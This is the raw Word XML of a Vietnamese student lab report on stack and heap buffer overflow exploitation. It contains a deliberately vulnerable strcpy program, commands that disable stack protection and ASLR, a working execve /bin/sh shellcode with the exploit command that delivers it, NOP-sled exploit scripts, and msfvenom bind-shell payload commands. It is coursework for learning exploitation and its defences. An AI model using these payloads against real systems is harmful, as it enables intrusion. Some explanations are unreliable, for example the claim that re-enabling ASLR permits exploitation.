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5B5FB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LAB 2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EFD4C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KHAI THÁC VÀ NGĂN CHẶN LỖI BUFFER OVERFLOW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021ADFF7">
      <w:pPr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</w:p>
    <w:p w14:paraId="04A1ECDA">
      <w:pP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t>Hồ Đình Nguyên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABF53C0">
      <w:pP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t>1050080025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFB016F">
      <w:pP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t>Link youtube:</w:t>
      </w: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fldChar w:fldCharType="begin"/>
      </w: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instrText xml:space="preserve"> HYPERLINK "https://www.youtube.com/channel/UCEPuvFCAI79ySOkCeCdgRyw" </w:instrText>
      </w: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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/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t>https://www.youtube.com/channel/UCEPuvFCAI79ySOkCeCdgRyw</w:t>
      </w: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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B451E">
      <w:pP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</w:p>
    <w:p w14:paraId="0ADDAFD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Câu 1: Khai thác lỗi Stack-based Buffer Overflow trên Linux 64 bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC6184C">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr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 w:bidi="ar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 w:bidi="ar"/>
        </w:rPr>
        <w:t>soạn thảo văn bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1520A1A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  <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E0FF8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  <w:t>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF9665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  <w:t>int main(int argc, char *argv[]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63564CC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  <w:t xml:space="preserve">    char buf[100];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D62A09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  <w:t xml:space="preserve">    strcpy(buf, argv[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3F455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  <w:t xml:space="preserve">    printf("Input was: %s\n", buf);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F70DF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  <w:t xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B35A41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 w:bidi="ar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vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F940F8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5980" cy="3625850"/>
            <wp:effectExtent l="0" t="0" r="762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3D08">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLine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t>biên dịch chương trình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E0E40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gcc -g -fno-stack-protector -z execstack buf.c -o buf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58139C0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Giải thích ý nghĩa tham số: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1477F65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-g: Sinh ra kí tự gỡ rối </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEE442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-fno-stack-protector: Bỏ stack protecter: tắt chức năng kiểm tra toàn vẹn bộ nhớ stack. (Ngăn chặn lỗi tràn bộ điệm) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1700253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>-z execstack: Làm cho bộ nhớ không thực thi được (Ngăn chặn lỗi tràn bộ điệm) -o: Tham số đầu ra (Tên tiến trình)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDA9CF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</w:p>
    <w:p w14:paraId="66CCA23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TimesNewRomanPS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2965" cy="991870"/>
            <wp:effectExtent l="0" t="0" r="635" b="241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t>1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman Regular" w:hAnsi="Times New Roman Regular" w:eastAsia="TimesNewRomanPS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Tắt chức năng Address Space Layout Randomization (ASLR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3B55D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$sudo sysctl kernel.randomize_va_space=0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613710C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Hoặc: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8298D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$sudo nano /proc/sys/kernel/randomize_va_space </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCB258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>#Chuyển giá trị 2 thành 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2780663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TimesNewRomanPS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</w:p>
    <w:p w14:paraId="30F5A3A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6615" cy="1643380"/>
            <wp:effectExtent l="0" t="0" r="698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9B0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Giải thích ngắn gọn tại sao phải tắt chức năng ASLR. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744D31E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>+Để có thể khai thác lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F5B96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vi-VN" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman Regular" w:hAnsi="Times New Roman Regular" w:eastAsia="TimesNewRomanPS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Cài đặt gdb và bắt đầu debug chương trình </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469E277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$sudo apt update &amp;&amp; apt install gdb -y </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA11C0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>$gdb -q buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594716E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7885" cy="1305560"/>
            <wp:effectExtent l="0" t="0" r="5715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775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9155" cy="2773045"/>
            <wp:effectExtent l="0" t="0" r="4445" b="209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93E0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TimesNewRomanPS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1.5 Bên trong môi trường gdb, chọn cú pháp assembly theo kiến trúc Intel và chuyển hàm </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727D093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TimesNewRomanPS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main thành ngôn ngữ assembly: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B65A5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- (gdb)set disassembly-flavor intel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3147BD7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>- (gdb)disass main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5BEF4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9155" cy="3004820"/>
            <wp:effectExtent l="0" t="0" r="4445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F43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TimesNewRomanPS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1.6 Xác định vị trí của return address (RIP) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DD01D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>(gdb)run $(python2 -c "print 'A'*100 + 'B'*12 + 'C'*8 + 'D'*6") (gdb)info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661ED25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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5938520" cy="3747770"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1143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0043C5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36702FC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 w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79418A0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>(gdb)x/100x $rsp-200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D710B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8520" cy="1979295"/>
            <wp:effectExtent l="0" t="0" r="508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96D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TimesNewRomanPS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Trả lời: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1969DF2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16D41C2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Ý nghĩa của thanh ghi rbp, rsp, rip: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3FB7F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52C6E89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Địa chỉ và giá trị của thanh ghi rbp: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7B92C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300EA2D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Địa chỉ và giá trị của thanh ghi rip: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E588F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7F40866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>Địa chỉ bắt đầu và kết thúc của buf trên stack</w:t>
      </w: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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73535A4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2609850" cy="1781175"/>
            <wp:effectExtent l="0" t="0" r="6350" b="222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73EE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1.7 Khai thác </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17237CA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- 52 chỉ thị NOP(No Operation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2611274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'\x90'*52 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD524F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Shellcode (48 bytes) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B979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'\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABA004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x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CFB8C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xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516520E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x0f\x05' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196CC37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Lệnh khai thác: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3090253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run $(python2 -c "print '\x90'*52 + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2443C5D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'\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6038C9D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x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AED6B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xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73313A4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x0f\x05' + 'B'*8 +'C'*8 + ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman Regular" w:hAnsi="Times New Roman Regular" w:eastAsia="SimSun" w:cs="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>x</w:t>
      </w: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>70\x38\x88\xBD'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E076E3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9790" cy="2750820"/>
            <wp:effectExtent l="0" t="0" r="381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D08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Câu 2: Khai thác lỗi Buffer Overflow với Listening Shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8A86C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2.1. Tham khảo và thực hiện hướng dẫn khai thác lỗi Stack-based buffer overflow có listening shell ở link </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413F77F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bên dưới. Chụp hình minh hoạ chiếm được shell sau khi hoàn thành mục ED 203.1 trong hướng dẫn. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E985E2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https://samsclass.info/127/proj/ED203.htm </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AACB49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32E3D09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Tải xuống và chạy chương trình: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E86FB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31E2251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Trong cửa sổ Terminal, thực hiện các lệnh sau: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FD11A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Wget -nv https://samsclass.info/127/proj/ED3a.c </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E39D21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Wget -nv https://samsclass.info/127/proj/ED3a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB3A69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Chmod a+x ED3a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDF60F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./ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E244F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15025" cy="2543175"/>
            <wp:effectExtent l="0" t="0" r="3175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F71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Xem mã nguồn </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398338C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Thực hiện lệnh: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cat ED3a.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226418B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0DFE40F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867400" cy="3486150"/>
            <wp:effectExtent l="0" t="0" r="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CE08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Làm một Fuzzer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC001D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Trong cửa sổ Terminal, thực hiện lệnh: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nano fuzzer #!/usr/bin/python import sys </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4B643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length = int(sys.argv[1]) print 'A' * length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F85F4F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248275" cy="3705225"/>
            <wp:effectExtent l="0" t="0" r="952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8DB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Thực thi các lệnh này để làm cho fuzzer có thể thực thi được và kiểm tra nó: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chmod a+x fuzzer </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D259BF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./fuzzer 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087FDDB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2D866B6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2965" cy="4046220"/>
            <wp:effectExtent l="0" t="0" r="635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540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Thực hiện các lệnh này để kiểm tra chương trình với các đầu vào có độ dài 1000 và 1010. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D14E57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./ED3a $(./fuzzer 1000) ./ED3a $(./fuzzer 1010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74C19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2965" cy="3255010"/>
            <wp:effectExtent l="0" t="0" r="635" b="215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3DB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Thực hiện các lệnh này để tải chương trình vào gdb và chạy nó. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A19266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Gdb -q ED3a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2395A99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Run $(./fuzzer 1020)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1257230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</w:p>
    <w:p w14:paraId="2D81FA6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0ED8AC2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1695" cy="3155315"/>
            <wp:effectExtent l="0" t="0" r="1905" b="196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57E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Trong cửa sổ Terminal, thực hiện lệnh: nano ex1 - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBA67C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Nhập mã này: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A50C05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#!/usr/bin/python prefix = 'A' * 1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BAC86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pattern = 'BBBBCCCCDDDDEEEEFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7624C93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0425" cy="2813685"/>
            <wp:effectExtent l="0" t="0" r="317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F3A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Thực thi lệnh này, lệnh này hiển thị các khai thác có sẵn cho nền tảng Linux, liên </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036CADC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kết một trình bao với một cổng TCP đang nghe: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F661E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sudo msfvenom -l payloads | grep linux | grep bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C52FE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56CE91C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6615" cy="4331335"/>
            <wp:effectExtent l="0" t="0" r="6985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A21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Khai thác chúng tôi muốn được đánh dấu ở trên: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linux / x86 / shell_bind_tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735093B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1627C8C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Để xem các tùy chọn tải trọng, hãy thực hiện lệnh này </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1154856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sudo msfvenom -p linux/x86/shell_bind_tcp --list-options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C100F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6D1D006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1695" cy="433959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A8F8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Xây dựng Khai thác </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3121C7A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1AB07C2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Trong CỬA SỔ MÁY CHỦ, thực hiện lệnh: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nano ex2 #!/usr/bin/python nopsled = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1163C29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'\x90' * 500 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281C1FD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suffix = 'A' * (1012 - len(nopsled) - len(buf)) eip = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5030DFF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'1234' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB09EA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attack = nopsled + buf + suffix + eip print </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063F774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attack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7140898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6CB6364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Thực thi các lệnh này để làm cho chương trình có thể thực thi và chạy nó.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chmod </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6203FDF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+x ex2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEB302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./ex2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2FA1B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0208ECB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>Chương trình chạy, in ra một chuỗi dài các ký tự kết thúc bằng "1234"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709A859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</w:p>
    <w:p w14:paraId="05637F5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666740" cy="1176020"/>
            <wp:effectExtent l="0" t="0" r="2286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682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667E517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2C66FC4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Tìm NOP Sled trong RAM </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF156B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7163090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Trong cửa sổ Terminal, thực hiện các lệnh: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2521C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gdb -q ED3a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C4A31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disassemble copier </w:t>
      </w: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572E705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Mã chạy đến điểm ngắt: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break </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEABED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* 0x08049241 run $(./ex2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C75EB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268D26A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9790" cy="357759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9A07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Xem khung xếp chồng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F31D5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0B0B4ED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Trong gdb, thực hiện lệnh này để xem các thanh ghi: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info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4377E4E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0AF46FC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4796790" cy="2098040"/>
            <wp:effectExtent l="0" t="0" r="381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37F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16ABF9D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</w:p>
    <w:p w14:paraId="60DFC33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22467E2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 w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C58C0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Trong gdb, thực hiện lệnh này để xem khung ngăn xếp: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x/410x $esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD19F1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</w:p>
    <w:p w14:paraId="70DAB7B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6615" cy="4652645"/>
            <wp:effectExtent l="0" t="0" r="6985" b="209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213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Hoàn thành mã khai thác </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4904E63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63DF603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Thực hiện các lệnh này để sao chép chương trình vào một tệp mới và chỉnh sửa nó.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cp ex2 ex3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA4A6B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nano ex3 gdb -q ED3a run $(./ex3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46638D3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</w:p>
    <w:p w14:paraId="396A8A8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2965" cy="3531870"/>
            <wp:effectExtent l="0" t="0" r="635" b="241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5F9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Câu 3: Khai thác lỗi Heap-based Buffer Overflow trên Linux 64 bit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CE9C6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3.1. Tham khảo hướng dẫn khai thác lỗi Heap-based buffer overflow link bên dưới. Chụp hình </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6AD1D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minh hoạ chiếm được shell sau khi hoàn thành mục ED 205.1 trong hướng dẫn. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D8250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>https://samsclass.info/127/proj/ED205c.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2B748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7885" cy="1696720"/>
            <wp:effectExtent l="0" t="0" r="571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515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t>xem mã nguồn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A1952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5980" cy="3728085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2BE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  <w:t>quan sát đóng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1788F91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1060" cy="40855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76E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</w:pPr>
    </w:p>
    <w:p w14:paraId="6C68B31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8520" cy="3199130"/>
            <wp:effectExtent l="0" t="0" r="508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Sửa đổi tệp: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD0C7F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#!/usr/bin/python print 'A' * 70 + '00112233445566778899'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2351FC2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0425" cy="4015105"/>
            <wp:effectExtent l="0" t="0" r="3175" b="234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74D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Gỡ lỗi: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gdb -q ./ED205 run $(./h2) info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1274743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1695" cy="3100705"/>
            <wp:effectExtent l="0" t="0" r="1905" b="234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829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Sửa đổi tệp: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA7AA73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alibri-Bold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#!/usr/bin/python </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7F496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Calibri-Bold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print 'A' * 80 + '1234'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C2012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21E2E55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4591050" cy="3943350"/>
            <wp:effectExtent l="0" t="0" r="635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E12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Gỡ lỗi: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gdb -q ./ED205 run $(./h3) info registers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA8A5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735A823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Thực hiện các lệnh này để tháo rời hàm winner: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disassemble winner </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10321A7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6FC1A2E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Tương tự tệp khai thác cuối cùng: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566346B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- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446E1CA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3600" cy="42583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C47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37885" cy="3164205"/>
            <wp:effectExtent l="0" t="0" r="5715" b="107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5EF9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Sửa đổi tệp: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC6AF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#!/usr/bin/python </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B52ADF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#0x080484cb </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A18A8D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print 'A' * 80 + '\xcb\x84\x04\x08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD7D23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1695" cy="4210050"/>
            <wp:effectExtent l="0" t="0" r="190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Gỡ lỗi: </w:t>
      </w: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gdb -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E871F9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./ED205 run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604201B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$(./h4) info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507535C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>registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1020056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</w:p>
    <w:p w14:paraId="595FB73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3600" cy="35026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694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2965" cy="3481070"/>
            <wp:effectExtent l="0" t="0" r="635" b="241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629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Câu 4: Các giải pháp ngăn chặn tấn công Buffer Overflow </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4998030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4.1. Biên dịch lại chương trình </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman Regular" w:hAnsi="Times New Roman Regular" w:eastAsia="Arial-ItalicMT" w:cs="Times New Roman Regular"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">buf.c </w:t>
      </w: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ở Câu 1, lần lượt KHÔNG dùng tham số </w:t>
      </w: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-fno-stackprotector </w:t>
      </w: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và </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFA33AE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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman Regular" w:hAnsi="Times New Roman Regular" w:eastAsia="CourierNewPSMT" w:cs="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">-z execstack. </w:t>
      </w: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Lúc này có thể khai thác lỗi buffer overflow trong chương trình được không? Giải thích </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C017D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và chụp hình minh hoạ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619446E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Giải thích: Không thể khai thác lỗi buffer overflow. Vì khi không dùng tham số -fno-stackprotector </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1748CE2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và -zexecstack khiến một số tham số không chạy được do khi tắt hai tham số trên sẽ dẫn tới việc </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D79D3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tràn bộ đệm. Và chức năng Address Space Layout Randomization (ASKS) bị tắt đi nên việc khai </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503EAE97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>thác lỗi bị chặn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104128F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1695" cy="35477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921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cs="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5941695" cy="3181985"/>
            <wp:effectExtent l="0" t="0" r="1905" b="184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07D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4.2. Bật lại chức năng Address Space Layout Randomization (ASLR). Lúc này có thể </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCDFCF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khai thác lỗi buffer overflow trong chương trình được không? Giải thích và chụp hình </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EFEEF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minh hoạ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5254E87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$sudo sysctl kernel.randomize_va_space=2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E0A7B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  <w:t xml:space="preserve">Giải thích: </w:t>
      </w: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Có thể khai thác lỗi buffer overflow trong chương đ trình do chức </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0DD962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 xml:space="preserve">năng Address Space Layout Randomization (ASKS) đã được bật và được phép </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF3090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 Regular" w:hAnsi="Times New Roman Regular" w:eastAsia="ArialMT" w:cs="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>khai thác lỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D89F51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32"/>
          <w:szCs w:val="32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9155" cy="4157980"/>
            <wp:effectExtent l="0" t="0" r="444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7080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32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman Regular" w:hAnsi="Times New Roman Regular" w:cs="Times New Roman Regular"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5937885" cy="3684270"/>
            <wp:effectExtent l="0" t="0" r="5715" b="2413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AA8D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en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="754DFD6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 Regular" w:cs="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman Regular" w:cs="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEF8F3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 Regular" w:cs="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40AC672B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>[1] “Thực hành an ninh mạng CSC 5991: Fengwei Zhang”. Truy cập: 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w: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Tháng Tư 2025. [Trực tuyến]. Có sẵn tại: https://fengweiz.github.io/16sp-csc5991/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C6EE6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</w:p>
    <w:p w14:paraId="119FFE1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[2] “Nhận Kali”, Kali Linux. Truy cập: 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman Regular"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w: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Tháng Tư 2025. [Trực tuyến]. Có sẵn tại: https://www.kali.org/get-kali/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3473FCF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</w:p>
